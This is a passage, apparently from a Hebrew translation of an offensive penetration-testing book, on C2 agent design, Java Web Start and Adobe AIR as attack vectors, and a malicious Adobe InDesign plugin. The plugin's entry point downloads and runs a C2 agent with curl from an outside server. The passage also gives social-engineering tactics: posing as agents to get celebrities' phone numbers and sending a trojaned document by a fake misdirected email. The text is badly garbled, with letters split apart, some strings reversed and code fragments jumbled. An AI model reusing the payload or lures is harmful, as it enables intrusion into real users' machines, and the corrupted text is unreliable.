‫ני טור מצ בם ש ל מאר חי ע בדים‪ .‬אם מאר ח ע בד נ כ ש ל או לא ניתן להגיע א ליו‪,‬‬
‫המאר ח מודיע ל שרת ‪C2.‬‬
‫מ שמ ש כצינור המר כזי בין שרת ‪ C2‬לצמתי הע בדים ‪C2.‬‬
‫ניתו ב נ כון ש ל הודעות ‪ C2‬לצמתי ע בד ‪ C2‬מ ב לי ש שרת ‪C2‬יצ טרך לציין שום ד בר‬
‫מ ל בד ה שם המזהה ש ל צומת הע בד ) כ לומר‪ ,‬שם ת חנת הע בודה(‪.‬‬
‫אין לה שתמ ש בצומת רא שי ליזום ב חירות חד שות וא חריות זו ממ שי כה להיות מ שותפת‬

‫ל כ ל המאר חים בת שתית ‪)C2‬פ שו ט כי המא ס טרי כו ל למות ב כ ל עת(‪.‬‬
‫א לגוריתם ב חירות לא צריך להיות מור כ ב‪ ,‬וגם לא צריך להיות‪ .‬במי לים פ שו טות‪ ,‬כא שר‬
‫הו ח ל ט )ע ק ב כ ש ל בת ק שורת או פר ק זמן חריג(‪ ,‬מתר ח שות ב חירות ש בהן כ ל ח בר‬
‫בת שתית ‪C2‬הוא ח בר מצ ביע‪.‬‬
‫ת ק שורת מתר ח שת באמצעות הודעות שידור והיא מער כת מ בו ס סת נ קודות‪.‬‬
‫המאר ח עם ה כי הר בה נ קודות הופך לצומת ה סו כן הרא שי ה חד ש‪ .‬גורמים המ שפיעים‬
‫ע ל נ קודותי כו לים להיות‪:‬‬
‫ח שי בותי ח סית ש ל הצומת‪ .‬האם זה שרת‪ ,‬ב קר ת חום או נ כ ס בע ל ערך ג בוה‬
‫שצוין בע ברידנית ע לידי ב קר ה שרת ?‪C2‬‬
‫מהימנות קודמת ש ל הצומת כפי שצוין ע לידי זמן פעו לה‪ .‬האם זו קופ סה‬
‫שנ כ בה ב שעה ‪ 17:00‬כ ליום?‬
‫אמינות ת ק שורת באופן כ ל לי‪ ,‬שניתן לדרג אותה ב כמה אופנים עם ציון שיורד‬
‫ב כ ל פעם שמא ס טר נתון ל כ ש ל בת ק שורת ‪)C2‬או להיפך‪ ,‬עו לה בהת ב ס ס ע ל‬
‫ההיפך(‪.‬‬
‫ריצוד א קראי כדי למנוע ס טגנציה‪.‬‬
‫הע ס ק ש ל ק ביעתי ח סי אדון‪/‬ע בד כמו זה הוא בעיה שעומדת בפני מפת חים ר בים‬
‫בת חומים לגי טימיים ל ח לו טין ש ל פיתו ח תו כנה ש בהם התגנ בות אינה גורם‪ .‬ל כן אין זה‬
‫מפתיע שזהי כו ל להיות קצתיותר מור כ ב מנ קודת המ ב ט ש לנו‪ .‬במדעי המ ח ש ב‪ ,‬בעיה זו‬
‫נ קראת ב חירת מנהיגים ) לא להת ב ל ב ל עם ב חירת מנהיגות(‪ ,‬וי ש בתו כה הר בה פרדיגמות‬
‫וא ס כו לותיי חודיות שהן מע בר לת חום ש ל ספר זה‪ ,‬א ב ל כדאי מאוד ל ח קור‪.‬‬
‫בנדי ט מפור סמים פופינג‬

‫בתור נער‪ ,‬בי לוי מר כזי ש לי )י חד עם כמה קו שרים בו ל טים( היה ס ל ברי טאים‬
‫מע שירים‪ .‬להגנתי‪ ,‬גד לתי בדרום מער ב ויי ל ס וזה א חד מאותם מ קומות שאתה צריך‬
‫לע שות בידור מ ש לך ‪ -‬ע בור ה קוראים האמרי קאים ש לי‪ ,‬ח ש בו ע ל לואיזיאנה ה כפרית‪.‬‬
‫פעם א חת הת ק שרנו לג'ורג' טא קי בדיו ק כ שהואיצא מה בית‪.‬‬

‫מו בן שהוא התעצ בן וגער בנו באומרו‪" ,‬אתם לאי כו לים לע שות את זה‪ ,‬זה שודד‬
‫שפוצץ‪ ".‬אז זה הפך ל שם המי לו לי ש ל המ ש ח ק‪ .‬התגו בות להת ק שרות ה ביתה ע לידי‬
‫י לדים ברי טים שאין להם מ שהו טו ביותר לע שות היו מגוונות‪.‬‬
‫צ'ר ל טון ה ס טון היה הג'נ ט למן המו ש לם כ ש בי ק שנו ממנו לה ס ביר את ע שרת‬
‫הדי ברות‪ ,‬ואי לו ז סה ז סה גא בור ה שתמ ש במי לים שאני לא מעז לרמוז ע ליהן‪.‬‬
‫פעם א חת בי לינו ע שר ד קות ב ט לפון ב שי חה עם ג ברת מענגת שה כ חי שה שהיא‬
‫א שתו ש ל לאונרד נימוי‪ ,‬א ב לי כו לנו ל שמוע אותו בר קע אומר ב קו לו היי חודי‪" ,‬הנ ח‬
‫שִים‪.‬‬
‫את ה ט לפון‪ .‬לָ ׂ‬
‫מ טה‪ .‬ה‪ .‬ט לפון‪".‬‬
‫למה אני מ להי ב אותך ב סיפורים ע ל נעורי הע ברייני?‬

‫אם היית רוצה לע סו ק בהתנהגות אנ טי‪ -‬ח ברתית כזו היום‪ ,‬כנראה שיהיה הר בה‬
‫יותר ק ל לה שיג מ ספרי ט לפון ש ל מפור סמים ) שא ל את ג'ניפר לורנ ס מה היא‬
‫מרגי שה לג בי א ב ט חת ס לו לר(‪ .‬אז‪ ,‬עם זאת‪ ,‬לא היה אינ טרנ ט‪ ,‬לא ‪iCloud,‬‬
‫ו בוודאי לא סמאר טפונים‪ -Carmarthen .‬ב ב‪ ,3991-‬האנ שים הי חידים שהיו להם‬
‫ט לפונים ס לו לריים היו סו חרי סמים‪ .‬אז איך ה שגנו מ ספרי ט לפון? זה היה הר בה‬
‫יותר ק ל ממה שאתה ע שוי ל ח שו ב ו‬
‫אנ חנו מ ק ב לים מ ספרי ט לפון? זה היה הר בהיותר ק ל ממה שנדמה לך וה שתמ שתי‬
‫הר בה ממה ש לימים א קרא באופן מ קצועי "הנד סה ח ברתית"‪.‬‬
‫אם ת סת כ לו ע ל ה קרדי טים ב סוף כ ל סר ט נתון‪ ,‬ת ב חינו ש כ ל מי שהיה ק שור‬
‫לפרוי ק ט מופיע בר שימה‪ :‬קיי טרינג‪ ,‬מעצ בי שיער‪,‬יועצים רו חניים‪ ,‬מי ש לאיהיה‪.‬‬
‫סו כנים‪ .‬סו כנים היו ה ח בר'ה שהיו מעניינים בהת ח לה כי בה ח ל טיהיו להם את‬
‫המ ספרים שרצינו וא חרי כמה הת ח לות שווא הת ח לנו מאוד לגרום להם לוותר ע ל‬
‫מ ספרים‪ .‬היינו מציגים את עצמנו כעור כי דין‪ ,‬עוזרים אי שיים‪ ,‬ח ברות מוניות‪Girls. ,‬‬
‫‪ D-‬עם זאת‪ ,‬עד מהרה למדנו שי ש את כ ל התע שייה ה טפי לית הזו בהו ליווד שניזונה‬
‫מ ס ל ברי טאים )או מ טפ לת בה באופן ב לעדי‪ ,‬ת לוי בפר ספ ק טי בה ש לך( והאנ שים‬
‫הא להיע שו ה כ ל כדי לה שת ל ב ב כו כ בים וגם להתפאר ב קה ל ה ל קו חות ש להם‪ .‬זה‬
‫שי לו ב ש ק ל לנצ ל‪ .‬עמית ל שע בר ש לי ה קים חנות ב לו ס אנג' ל ס למ כירת פתרונות‬
‫א ב ט חה " בהזמנה אי שית" ע בורידוענים‪ .‬הוא היה לו ק ח ט לפון ש ל ס ל ב‪ ,‬מניף‬
‫מע ליו שר בי ט ק סמים ומצהיר שהוא מאו ב ט ח א ב ל באותו הזמן הוא היה מוריד את‬
‫אנ שי ה ק שר כדי שיו כ ל להר חי ב את ב סי ס ה ל קו חות ש לו‪.‬‬
‫ציני א ב ל מ ברי ק‪.‬‬

‫אם אתהיודע את המינוף הנ כון ל שים ע ל האנ שים הנ כונים‪ ,‬ק ב לת מידע מיו ח ס‬
‫הוא טריוויא לי‪ .‬למדתי עוד מיומנות ח שו בה א חת מ כ ל זה וזה לד בר במ ב טאים‬
‫א חרים‪ .‬זהיתפת ח מאו חריותר ל טרי ק המפ לגה ה חתימה ש לי‪ .‬אם לא ראית אותי‬
‫עו שה את המ ל ט בתור ג'ון וויין‪ ,‬לא חווית את שיי ק ספיר לגמרי‪.‬‬
‫כת ב ויתור‪ :‬א ל תע שה קונד ס להת ק שר למפור סמים‪ ,‬זה לא גדו ל‪ ,‬זה לא ח כם‪ ,‬זה‬
‫לא מצ חי ק‪ .‬נאמר מ ספי ק‪.‬‬
‫מ ש לו ח מ טען ח ל ק ‪ VIII:‬שונות ע שיר‬

‫תו כן אינ טרנ טי‬
‫די ברנו ע ליי שומוני ג'אווה ונגענו ‪ -Adobe Flash‬ב בתור ו ק טורי הת קפה‪.‬‬
‫עם זאת‪ ,‬מ כיוון שאור ק ל ה ביעה רצון לה ח ליףיי שומונים בצורתם הנו כ חית ו כ שיצרניות‬
‫הדפדפנים אי בדו את כ ל ה ס ב לנות עם אדו בי בג ל ל היעדר מו ח ל ט ש ל שי טות קידוד‬
‫מאו ב ט חות‪ ,‬אף א חת מה ט כנו לוגיות ה ל לו לא ת שאר לנצ ח‪.‬יור שיהם כ בר נמצאים‬
‫בפרי סה פעי לה ומתאימים ל שימו ש בהת קפות דוגמנות ‪ APT.‬למרות שהם מאוד שונים‬
‫זה מזה מ ב חינה ט כנו לוגית‪ ,‬האופן ש בו הם מציעים תו כן למ שתמ ש הוא )ויזוא לית( לא כ ל‬
‫כך שונה‪ ,‬ו ל כן הגיוני לד בר ע ל ה שניים בי חד‪.‬‬
‫‪Java Web Start‬‬
‫יי שומי ‪JWS‬אינם פוע לים בתוך הדפדפן א לא נפר סים בדרך כ ל ל דרך ממ ש ק הדפדפן‪.‬‬
‫מנ קודת מ ב ט ש ל פיתו ח תו כנה‪,‬י ש לזה כמהיתרונות‪ ,‬א ב ל בעי קר זה מאפ שר ניהו ל‬
‫זי כרון הר בהיותר מעודן וא כן ה קצאה ש ל הר בהיותר זי כרון ממה שהיה מ סופ ק בדרך‬
‫כ ל ל ליי שומון‪Java Web Start .‬נפר ס כעת כ ברירת מ חד ל עם ‪Environment‬‬
‫‪ Java Runtime‬ואין צורך להת קין אותו בנפרד ע לידי המ שתמ ש‪.‬‬
‫במ קום ל טעון קו בץ ‪ jar‬מתוך דף ‪ HTML, JWS‬מ שתמ ש ב קו בץ ‪ XML‬עם סיומת ‪plnj.‬‬
‫‪ ( Java Network Launching Protocol).‬כא שר מ שתמ ש לו חץ ע ל ה קו בץ‪- .jar ,‬ה‬
‫נ טען מהר שת ומוע ברי שירות ל‪ ERJ-‬ל ביצוע‪ ,‬א שר שו ב מתר ח ש במ סגרת מ ש לו ו לא‬
‫בה ק שר ש ל ח לון הדפדפן‪ .‬קו בץ ‪ .jnlp‬להפע לת ‪ .jar‬מהאינ טרנ ט נראה כך‪:‬‬
‫>‪encoding="UTF-8"?> <jnlp spec="1.0+" codebase="http://c2.org/c2" href=""> <information‬‬

‫"‪<?xml version="1.0‬‬
‫‪ <title>JWS APT‬כיף! >‪<rodnev></title‬הדגמה ש ל >‪vendor> <offline-allowed/‬‬

‫‪APT.</‬‬
‫>‪</information‬‬
‫>מ שא בים<‬
‫>‪java.sun.com/products/autodl/j2se"/> <jar href="c2.jar" main="true"/‬‬
‫‪<j2se version="1.5+" href="http://‬‬
‫>‪main-class="c2applet.Main" width="300" height="200"> </applet-desc‬‬

‫"‪</resources> <applet-desc name="c2 applet‬‬
‫>‪check="background"/> </jnlp‬‬
‫‪<update‬‬
‫א חת ה סי בות שאור ק ל ציינה למע בר למוד ל זה הייתה "א ב ט חה"; עם זאת‪ ,‬כ ל עוד‬
‫קו בץ ‪-.jar‬ההמיועד להפניה המ כי ל את המ טען ‪ C2‬חתום ב קוד )ראה פר ק ‪ 2,‬מ כיוון‬
‫שהתה ליך זהה(‪ ,‬אין הג ב לה ע ל מער כת ה ק בצים‪ ,‬ביצוע התה ליך או כ ל ד בר א חר‪.‬‬
‫‪Adobe AIR‬‬
‫בדומה ‪ -JWS, Adobe AIR‬ל מ שתמ שת ב ט כנו לוגיות קיימות כדי להפעי ל תו כן ש באופן‬
‫מ סורתי היה מ בוצע בתוך הדפדפן במ סגרת עצמאית‪ .‬אפ לי קציות ‪AIR‬הן פ ל טפורמות‬
‫וידידותיות לנייד‪ .‬מנ קודת המ ב ט ש לנו‪ ,‬בניגוד ‪ -Flash‬ל שפוע ל בדפדפן אינ טרנ ט‪,‬‬
‫אפ לי קציות ‪ AIR‬פוע לות עם אותן מג ב לות א ב ט חה כמו אפ לי קציות מ קוריות ו כ כא להי ש‬
‫להן גי שה למער כת ק בצים ל לא ארגז חו ל‪ .‬הםי כו לים להפעי ליי שומים‪ ,‬לג שת לר שת ו כן‬
‫ה לאה‪) .‬פונ קציונ ליות זו מצ טמצמת באופן דרמ טי בפ ל טפורמות ניידות ‪ -‬במיו חד ב‪SOi-‬‬
‫ש בהן‪ ,‬כמו ב כ ל אייפון‪/‬אייפד ל לא כ לא‪ ,‬ר ק מער כת ה ק בצים המ קומית נגי שה‪(.‬‬
‫יי שומי ‪AIR‬נוצרים באותו אופן כמויי שומוני ‪ Flash‬באמצעות אותן ט כנו לוגיות ש ל‬
‫‪Adobe.‬‬
‫מי לה ב‪5LMTH-‬‬
‫‪ HTML5‬וה ט כנו לוגיות הנ לוות לו עדיין מתפת חות ונמצאות ונ כון לע כ שיו אינן מעניינות‬
‫במיו חד )מנ קודת המ ב ט ש ל דוגמנות ‪APT).‬‬
‫ד בר א חד שמעניין וראוי למ ח קר נו סף הוא ש‪ 5LMTH-‬מאפ שר כתי בת תו כן לדי ס ק‪,‬‬
‫אם כי למער כת ק בצים ויר טוא לית מ לאה בארגז חו ל‪ .‬אני מז כיר את זה כאן אך ור ק‬
‫בג ל ל ש לד ברים כא להי ש דרך להיות בצורת אג ס מנ קודת מ ב ט בי ט חונית וזו ע שויה‬
‫להיות דרך מעניינת בעתיד לע קוף אזורי א ב ט חה‪ .‬לעת עתה‪ ,‬זהיותר עניין מ סוג "צפה‬
‫במר ח ב הזה"‪.‬‬
‫ההת קפה‬
‫בתדריך הצהרתי שאני רוצה לת קוף בדרך כ ל שהי את התה לי כים ש בהם מ שתמ ש צוות‬
‫הערי כה‪ .‬הפי לו סופיה מא חורי זה היא שראוי לך ל למוד את הדרך ש בה המ טרה ש לך‬
‫פוע לת כדי ליצור את ההת קפות המוצ ל חות והמדוי קות ביותר‬
‫למד את הדרך ש בה המ טרה ש לך פוע לת כדי ליצור את ההת קפות המוצ ל חות והמדוי קות‬
‫ביותר האפ שריות‪ ,‬במ קום לה סתמך ע ל ניצו לים או הת קפות גנריות‪.‬‬
‫מת קפה זו מ כוונת א ל ‪ Adobe InDesign,‬פרי סת פר סום וערי כה מור כ בת‪ .‬במ קום ל חפ ש‬
‫ג לי שות מאגר ש לא פור סמו או באגים א חרים ש ל ש חיתות זי כרון‪ ,‬המ טרה היא ליצור תו סף‬
‫‪ InDesign‬עוין ו להערים ע ל מ שתמ ש להת קין אותו‪.‬יצירת תו ספים ע בור ‪InDesign‬י כו לה‬
‫להיות תה ליך מור כ ב‪ ,‬א ב ל ה קוד הזה לא צריך להיות מ סו בך מדי מ כיוון שהמ טרה היא פ שו ט‬
‫ל ספ ק את סו כן ‪ C2‬ש לנו‪ .‬בנו סף‪ Adobe ,‬מ ספ קת ער כת פיתו ח תו כנה מ לאה ‪(SDK).‬‬
‫היעדים מריצים את ‪OS X,‬אז כדי ליצור תו סף אנ חנו צרי כים את הד ברים ה באים‪:‬‬
‫‪Adobe InDesign CS5‬‬

‫‪ )Apple InDesign SDK‬קי שור להורדה(‬
‫מ ק עם ‪OS X, El Capitan‬‬
‫הגר סה הא חרונה ש ל ס בי בת הפיתו ח ‪ Xcode‬ש ל אפ ל‬
‫אין הנ חה ש לידע מו קדם ע ל ה ס בי בה‪ .‬הערה מהירה ל קורא ‪ -‬לא א כפת לי במיו חד ‪-Xcode‬מ‬
‫כ ס בי בת ‪ RAD.‬מעו לם לא מצאתי שזו הדרך ה טו בה ביותר או ה ק לה ביותר ליצור קוד אפי לו‬
‫למ טרות הייעודיות ה ספציפיות ש לו ) כ לומר‪ ,‬פיתו ח ‪ Mac‬ו‪ (enohPi-‬ו בפר ק ה בא‪ ,‬כא שר נדון‬
‫ביצירת קוד עוין לאייפון ואנדרואיד‪ ,‬א ק חיציאה רדי ק לית ממנו לה כנ סת כ לים א חרים‪ .‬עם‬
‫זאת‪ ,‬כרגע אין מנו ס מזה‪.‬‬
‫ת בנית זו היא בעצם תו סף ‪ InDesign‬רי ק‪ .‬הוא מ כי ל את כ ל מה שצריך כדי ל בנות תו סף‬

‫ש כפי שהוא לאיע שה כ לום‪ .‬לא א כפת לנו מ כ ל פונ קציונ ליות ‪-SDK‬ה מע בר לפרוי ק ט שיי בנה‬
‫בהצ ל חה‪ .‬שאר ה קודיהיה ‪ C++‬גנרי ל ח לו טין בתוך עורך ‪Xcode.‬‬
‫המ טרה אפוא היא להו סיף את ה קוד הדרו ש להורדה ויי שום ש ל סו כן ‪ C2‬ש לנו ו לה ב טי ח‬
‫ש קוד זהית בצע כא שר התו סף מופע ל‪.‬‬
‫הפ קודה ב‪ + +C-‬ל ביצוע פ קודת מע טפת חיצונית היא ‪system.‬‬
‫למען הפ ש טות המופ לגת‪ ,‬מת בצעות שתי קריאות מער כת ‪-‬א חת לא חזר את סו כן ‪ C2‬וא חת‬
‫ל ביצועו‪:‬‬
‫)"‪system("curl -O http://c2server/c2agent") system("./c2agent‬‬
‫דוגמה זו נועדה לה בהיר‪ .‬אני מצפה ממך להיות מ סוג ל לע שות מ שהו טו ביותר‪ .‬אני מ שתמ ש‬
‫‪ -curl‬ב ו לא ‪ -wget,‬ב מ כיוון שהרא שון מות קן כ ברירת מ חד ל ‪ -OS X,‬ב‬
‫ כפי שמוצג באיור‬SDKPluginEntrypoint.cpp , ‫ קוד זה כ לו ל ב קו בץ‬.‫ואי לו הא חרון לא‬

8.8.
SDKPluginEntrypoint.cpp. ‫ קו בץ‬8.8: ‫איור‬
#include "PlugIn.h" PlugIn

‫ ס ט טי‬#include "VCPlugInHeaders.h"
gPlugIn;
.‫זוהי נ קודת ה כני סה הרא שית מהאפ לי קציה לפ לאגין‬/** GetPlugIn
‫היי שום קורא לפונ קציה זו כא שר הפ לאגין מות קן‬
‫ אז היא חיי בת להיות‬,‫ פונ קציה זו נ קראת ב שם‬.‫או טעון‬

‫ש קוראים לו‬
‫ @ה סופר ג'ף גהמן‬C. ‫ ומוגדר כ קי שור‬GetPlugIn,
/
IPlugIn GetPlugIn() {
c2agent") system("./c2agent") return &gPlugIn;

system("curl -O http://c2server/
// End, SDKPlugInEntrypoint.cpp
8.9. ‫ כפי שמוצג באיור‬Xcode, ‫כעת בנה את התו סף בתוך‬

‫איור ‪8.9:‬תפרי ט בניית ‪Xcode.‬‬

‫אם ה כ לי לך כ שורה‪ ,‬כעתיהיה לך תו סף ‪ InDesign.‬בדרך כ ל לי ש לא לה סיומת ‪nlp.‬‬
‫‪ .framework ,‬ואאך בהתאם לגר סה ש ל ‪ Xcode‬ש בה אתה מ שתמ ש‪,‬יית כן‬
‫ש ב‪ caM-‬אין לה סיומת כ ל ל‪ .‬העת ק את הפ לאגין הזה לתוך ספריית מ שנה ש ל‬
‫תי קיית התו ספים ש לך ‪ -InDesign.‬ב שו ב זה מ שתנה לפי גר סה‪ ,‬א ב ל בדרך כ ל ל ניתן‬
‫למצוא אותו ב ק לות עם ח לון היי שום ‪ -Finder,‬ב כפי שמוצג באיור ‪8.10.‬‬
‫איור ‪ 8.10:‬מ טען הר ח בת סו כן ‪C2.‬‬

‫אזי ש לנו תו סף עוין פ שו ט מאוד שאנ חנו צרי כים את המ טרה ש לנו כדי להת קין‪ .‬מה‬
‫ע לינו לע שות‪ ,‬פ שו ט ל ש לו ח להם את זה? זה מ חוץ לזרימת הע בודה ש ל העו לם הזה‪.‬‬
‫‪ InDesign,‬בהיותויי שום הוצאה לאור‪ ,‬צריך לה ב טי ח ש כ ל הת לות מת קיימת לפני‬
‫הע ברת מ סמך מצוות ערי כה ל בית דפו ס‪ .‬לדוגמה‪ ,‬אםי ש צורך בגופן מ סוים ו למדפ סת‬
‫הגופן לא מות קן במ ח ש ב ש לה‪,‬י ש בעיה‪ .‬אותו ד בר אם מ סמך‬
‫הגופן שהות קן במ ח ש ב ש להם‪,‬י ש בעיה‪ .‬אותו ד בר אם מ סמך צריך תו סף מ סוים‪.‬‬
‫כדי לפתור בעיה זו‪ -InDesign ,‬לי ש פונ קציונ ליות ש ל ח בי לה שי כו לה ל כ לו ל את כ ל‬

‫הת לות הנדר שת במ סמך המ סירה‪ .‬בדרך זו‪ ,‬אם תו סף ) למ ש ל‪ ,‬סו כן ‪ C2‬ש לנו( אינו‬
‫זמין‪ ,‬הואיות קן כא שר הנמעןיפת ח את ה ח בי לה‪ .‬זהו תה ליך ב ל חיצה א חת בתוך‬
‫‪InDesign,‬א ב לי ש לנו הר בה אפ שרויות לג בי מה ל כ לו ל )או באמת לא ל כ לו ל(‪ ,‬כפי‬
‫שמוצג באיור ‪8.11.‬‬
‫איור ‪8.11:‬אריזה לפני טי סה ‪ -InDesign.‬ב‬

‫ה שאר זה הנד סה ח ברתית‪ .‬ה שא לה היא את מי לת קוף‪ ,‬את המדפ סים או את המו" לים?‬
‫נו כ ל להת חזות ל ל קו ח ש ל המדפ סת ו ל ש לו ח להם מ סמך ‪InDesign‬נו שא מ טען‪ ,‬א ב ל‬
‫ס ביר להני ח שזהיתפר ק מהר‪.‬‬
‫א ס טר טגיה טו בה היא ת ח בו לת הדואר הא ל ק טרוני הי שנה שגויה‪ ,‬ש כן היא תגרום‬
‫לפתי חת המ סמך אךייד חה במהירות כא שר היעדי בין שהוא לא נועד ע בורו‪ .‬דוא" ל‬
‫מע ק ב מהיר כמה ד קות לא חר מ כן‪ ,‬שאומר " ס לי חה ‪ -‬לא ב ש בי לך!"‬
‫ֹתם‪ .‬דוא" ל מע ק ב מהיר כמה ד קות לא חר מ כן‪ ,‬שאומר " ס לי חה ‪ -‬לא ב ש בי לך!"י סייע‬ ‫או ָ‬
‫בתה ליך פי טורין נפ שי זה‪.‬‬
‫כמו בן‪ ,‬בהת ח ש ב בעו בדה שה כוונה ש לנו היא ל שנות מ סמ כים לא חר תה ליך הערי כה‬
‫אך לפני ההדפ סה‪ ,‬נו כ ל ל ל כת הר בהיותר ר חו ק מהדוגמה הפ שו טה הזו ש ל ‪SDK.‬‬
‫במ קום לפרו ס את ‪C2,‬נו כ ל לה שתמ ש ‪ -SDK‬ב כדי למצוא ו ל שנות מ סמ כים‪ .‬הוא מ כי ל‬
‫את כ ל הפונ קציונ ליות לאו טומ טיות ש ל כ ל סוג ש ל פונ קציונ ליות ש ל ‪InDesign.‬‬
‫האפ ק טי ביות ש ל מת קפה כזו תהיה ת לויה בזמן ההו ב לה שי ש לתו קף‪.‬‬
‫סי כום‬
‫ה ל ק ח מת חי לת ה ספר הזה היה ש ט בעו ש ל האיום מ שתנה אך נ שאר זהה‪ .‬כ כ ל‬
‫שה ט כנו לוגיות מתפוגגות‪ ,‬צצות חד שות תופ סות את מ קומן ואין סי בה ל ח שו ב שהןיהיו‬
‫ב טו חותיותר מ קודמותיהן‪ .‬הה בד ל בין הת קפה מוצ ל חת למ שימה כו ש לת הוא עד‬
‫כמה אתה מ בין את המ טרה‪ ,‬התה לי כים ש לה וה ט כנו לוגיות ע ליהן היא נ שענת‪ .‬ברגע‬
‫שתצ לי ח לע קו ב א חר זרימת הע בודה ש להם‪ ,‬תו כ ל לג לות ו לנצ ל פגיעויות בתו כו‪.‬‬
‫בדוגמה ש ל מ סמך ‪-InDesign,‬הזה צריך להיות מו בן מא ליו כי אמון בתו סף ש ל צד‬

‫ש לי שי שי כו ל לע שות ה כ ל היא פגיעות א ב ט חה רצינית‪ .‬עם זאת‪ ,‬רו ב האנ שים‬
‫שמ שתמ שים ‪ -InDesign‬ב לעו לם לאי ש ק לו אפ שרות זו‪ ,‬מ כיוון שזה בדיו ק כמו כ ל‬
‫תו סף א חר ש ל ‪ InDesign‬שהם נת ק לים בהם ע ל ב סי סיומי‪ .‬האופן ש בו הם נארזים‬
‫ונפר סים היא עו בדת חיים ה כר חית ל כ ל מי שעו ס ק בערי כה ו ב חתימה ע ל תו כן או‬
‫ב ק ב לתו להדפ סה ו לפר סום‪ .‬ניתן להר חי ב את האנ לוגיה הזו ל כ ל ע ס ק‪.‬‬
‫‪ 1.‬ח קור את האמצעים ה שונים לפרי סת תו כן ע שיר בדפדפן אינ טרנ ט ו כיצד ניתן‬
‫ל שנות את ה כ לים וה ט כנו לוגיות ה ל לו כדי ל ספ ק הת קפות )הן מ בו ס סות ע ל הנד סה‬
‫ט כנו לוגית והן ע ל הנד סה ח ברתית(‪.‬י ש הר בה ל ב חירה‪.‬‬
‫כדי להת חי ל‪ ,‬הורד את ההדגמה ה חינמית ש ל ‪ Mulitmedia Fusion.‬שימו ל ב‬
‫באיזו מהירות ניתן ליצור תו כן מור כ ב באמצעות תו כנה זו‪ ,‬כמו גם ב ס בי בות‬
‫המגוונות שא ליהן היאי כו לה לפרו ס‪.‬‬
‫‪ 2.‬ח קור פרו טו קו לי ר שת ה חיוניים לתפ קוד הפנימי ש ל ר שת כגון ‪-OSPF.‬ו ‪ICMP, RIP‬‬
‫‪ ARP,‬כיצד ניתן לה שתמ ש בהם כדי ל שאת נתונים באופן סמוי? הת ח ל עם ‪ARP,‬‬
‫המאפ שר ת ק שורת שידור‪.‬‬
‫זה שימו שי‪ ,‬כפי שראינו בפר ק זה‪ ,‬אך גםי כו ל ל שמ ש להע ברת נתונים בין שתי‬
‫כתו בות ‪ IP‬בר שת ל לא שימו ש ב שידור‪.‬‬
‫‪ 3.‬למד את הרעיון ש ל ב חירת מנהיג ו כיצד ניתן למנף אותה ביצירת ס בי בות ‪C2‬‬
‫או טונומיות‪ .‬זהי כו ל לע בור הר בה מע בר ל ש לי טתם ש ל סו כני ‪ C2‬פ שו טים בר שתיעד‬
‫א חת וניתן לה שתמ ש בו ביצירת ר שתות בו ט או טונומיות ר ח בות לאינ טרנ ט‪.‬‬
‫‪4.‬תרגי ל בונו ס )ר ק ב ש בי ל ה כיף(‪ .‬די ברנו הר בה ע ל הנד סה ח ברתית בפר ק זה וא חד‬

‫המר כי בים להצ לי ח שם הוא להי שמע אותנ טי ב ט לפון‪ .‬בהנ חה שאתה דו בר אנג לית‬
‫שפת אם‪ ,‬למד לד בר במ ב טא ש לא מו כר לך‪ .‬אם אתה מד בר בא חת מהצורות הר בות‬
‫ש ל אנג לית ברי טית‪ ,‬אנג לית ק ליפורנית היא ה ק לה ביותר ל ש לי טה‪ ,‬אז ב חר מ שהו כמו‬
‫ברו ק לין או קייג'ון ‪-‬א להיהיו מאתגריםיותר‪ .‬מצד שני‪ ,‬אם אתה אמרי קאי‪ ,‬אז ק שה‬
‫ל ש לו ט בהגייה ‪ British Received,‬ו כך גם ‪ -British West Country.‬ב לעתים קרו בות‬
‫ש ח קנים צרי כים ל למוד מ ב טא א חר באופן מ קצועי‪ ,‬ו כתוצאה מ כךי ש הר בה קור סים‬
‫זמינים למ טרות כא לה‪.‬‬
‫פר ק ‪ 9‬ח שיפה צפונית לאורך ספר זה ב חנו את ההי ב טים ה שונים המעור בים‬
‫במוד ל תר חי שי ‪ APT‬ע לידי דיון בהת קפות נגד מ טרות חיות במגזרים שונים‪.‬‬
‫בפר ק הא חרון הזה‪ ,‬אנ חנו הו ל כים לע שות מ שהו קצת שונה‪ .‬במ קום ל שר ט ט‬
‫מת קפה ע ל מ טרה לגי טימית‪ ,‬אנ חנו הו ל כים לה סת כ ל ע ל אי סוף מודיעין‬
‫היפות טי ע ל מדינת לאום‪ .‬ב חרתי בצפון קוריאה כמ טרה מ כמה סי בות‪ ,‬א ב ל‬
‫בעי קר שה סודיות האדירה שאופפת את אותה מדינה נזיר‪ ,‬ט כנו לוגיות ‪-IT‬ה‬
‫ה שונות והצנזורה הר בה )א כן ח סרת ת קדים( איתה מתמודדים אזר חיה ע ל‬
‫ב סי סיומי הופ כים אותה למ ס קרנת‪ .‬דוגמה ומאפ שרת לי להדגים כמה מידע‬
‫ניתן לה סי ק ממה שזמין לצי בור‪.‬‬
‫עם זאת‪ ,‬זו לא ה סי בה הי חידה‪ .‬ש לא כמו כ ל מדינת לאום א חרת‪ ,‬ניתן לתאר את צפון‬
‫קוריאה ביתר ק לות במונ חים הדומים לתאגיד סגור הן במו בן הגיאופו לי טי והן מ ב חינה‬
‫ט כנו לוגית ו לא ר ק במדינה א חרת ) לפ חות מנ קודת מ ב ט מ קרו ס קופית( ‪ -‬כמו בן שזו לא‬
‫ח ברה שהייתי רוצה לה‪ .‬לע בוד ע בור א ב ל ה סודיות היא חרדה ליועץ א ב ט חה טו ב‪ ,‬ו ל כן‬
‫אי אפ שר ש לא לה סת קרן מפעו לותיו הפנימיות‪.‬‬
‫ע ל ר קע זה‪ ,‬אניי כו ל להציג כמה גי שות א חרות ל בדי קות חדירה מת קדמות ש כדאי‬
‫לה כיר‪ ,‬בין אם הן ט כני קות ש ל בית ספרי שן ‪ -‬מנו סו ו בדו קות ‪-‬או רעיונות חד שיםיותר‪,‬‬
‫צציםיותר‪ .‬ל כן‪ ,‬ב חינת צפון קוריאה כמדינת לאום סגורה אך בה ק שר האנ לוגי ש ל מ ב חן‬
‫חדירה תאגידי מאפ שרת לנו להתיי ח ס לניתו ח כא ל תה ליך כו ל ל‪.‬‬
‫נ סת כ ל ע ל ה ט כנו לוגיות שצפון קוריאה פור סת כגון‪:‬‬

‫מער כות ההפע לה ש ל צפון קוריאה המ בו ס סות לינו ק ס ע ל שו ל חנות ע בודה ו שרתים‬
‫הנו כ חות האינ טרנ טית ש לו )וה קצאת כתו בות ה‪ PI-‬ש לו(‬
‫ר שת ה ט לפון ש לו‬
‫ר שת ה ט לפון הנייד ש לה והת קנים מאו שרים‬
‫האינ טרנ ט הצפון קוריאני המו קף חומה‬
